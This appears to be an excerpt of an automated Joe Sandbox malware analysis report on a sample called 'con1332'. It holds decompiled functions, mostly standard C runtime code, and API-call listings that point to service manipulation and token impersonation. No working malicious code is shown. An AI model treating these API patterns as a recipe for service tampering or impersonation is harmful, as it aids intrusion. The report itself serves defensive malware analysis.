0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 0701A1A8 Relevance: 1.8, APIs: 1, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0701A4A0

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: b0eb55307f453db13f58ac554ac8620a7dd61f60963912462f636ed68cd844f1
Instruction ID: b21557a56b7e808f84cf75bba2643a7cab93568c5f1cc42b1f87ea57aff5ba63
Opcode Fuzzy Hash: b0eb55307f453db13f58ac554ac8620a7dd61f60963912462f636ed68cd844f1
Instruction Fuzzy Hash: 96C14BF1E0161A8FDB54CFA8C8857AEBBF1BF48310F14C669E855E6284DB749885CB81

Uniqueness

Uniqueness Score: -1.00%

Function 070199E8 Relevance: 1.6, APIs: 1, Instructions: 92
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32(?,?,?), ref: 07019AC2

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 1bad88bb1ff02b7a9db390ee63777c1505737eabdd8a33518659c2a4cfebbc72
Instruction ID: ea24e849f1245bb47316a5eb161547f449baa876a233ba04990d6bcad606b002
Opcode Fuzzy Hash: 1bad88bb1ff02b7a9db390ee63777c1505737eabdd8a33518659c2a4cfebbc72
Instruction Fuzzy Hash: 673136B0D102599FCB10CFA9C99479EBBF5FB48710F148629E855A7340D774A84ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 07019920 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 070199A5

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c1909bc2f0000dc6cd09b09c136594396a541ae1719a4f600a3c53f1eb017a13
Instruction ID: a0b888e6ca052fe18171d6ba53a2901b8818056fd262969352563e2e3d1a96c9
Opcode Fuzzy Hash: c1909bc2f0000dc6cd09b09c136594396a541ae1719a4f600a3c53f1eb017a13
Instruction Fuzzy Hash: B02135B5C002599FCB50CF99D884BDEFBF4FB88310F10821AD809AB204D774A540CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07019180 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 070191F4

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: acb7356dc5f53d97ae739041baeeb0df772191cc8cee02223b05649829c3c193
Instruction ID: 429a0a5fd7c1d8f42a513bc73ba804afc7815224ab441ac71878625dd272d69c
Opcode Fuzzy Hash: acb7356dc5f53d97ae739041baeeb0df772191cc8cee02223b05649829c3c193
Instruction Fuzzy Hash: AB11F4B1D002499FCB10DFAAC884AEEFBF5FF58314F54852AE419A7240C778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0701A0E8 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 0701A158

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 2b9ec9f4ac1a45f2f1f460cecba7e07be9c668c15b4f81b5b67939470b2a5b5b
Instruction ID: 4fb255f9cc1d21f53da01804c6237651ba4d8895f1d03a3b7e30a14e3d1af507
Opcode Fuzzy Hash: 2b9ec9f4ac1a45f2f1f460cecba7e07be9c668c15b4f81b5b67939470b2a5b5b
Instruction Fuzzy Hash: 5011E2B5D006199FDB10CF9AC984BDEFBF8EB48324F10852AE558A3740D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07019350 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 070193B2

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 746e07baaf6e98aa42f2ea7f3dff1d7570a329077852157d0e1f6a42445f2c88
Instruction ID: f9ad84a643e2935f9567c6e8a4d37fa7cfed09aa18c3cfbe0dab27b05019340d
Opcode Fuzzy Hash: 746e07baaf6e98aa42f2ea7f3dff1d7570a329077852157d0e1f6a42445f2c88
Instruction Fuzzy Hash: BF1125B19006498BCB10DFAAC4447EEFBF9EB88324F20842AD419A7640C778A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07019ED8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 07019F37

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: aacbc132ea7de610ef0179742e413695d4196002d8b7d39a2a3360a357d1f3dc
Instruction ID: 010db3c0e8009bbf657727eb8d82ea9274eef96f9d320a1bdbd2568c6a1b4a11
Opcode Fuzzy Hash: aacbc132ea7de610ef0179742e413695d4196002d8b7d39a2a3360a357d1f3dc
Instruction Fuzzy Hash: 1A1103B1900659DFDB10CF9AC584BEEFBF8EB48324F20846AD558A3640D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07019CC8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 07019D27

Memory Dump Source

Source File: 00000006.00000002.371854970.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7010000_con1332.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: dac366c7d9b886045b617eb43741fe3454536dafab607a9976b1cef7ca70603c
Instruction ID: 2e0d1119a435c6c568e18712dccf6b4c9e5d0a805fd1282c17020c12b205950c
Opcode Fuzzy Hash: dac366c7d9b886045b617eb43741fe3454536dafab607a9976b1cef7ca70603c
Instruction Fuzzy Hash: 7D1133B18002598FDB10CF9AC584BEEFBF8EB48324F20842AD418A3640D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x71089e4d
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x71089e4d
				_v812 = _t12;
				_t13 =  *0x422238; // 0x8ef761b2
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x71089e4d
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
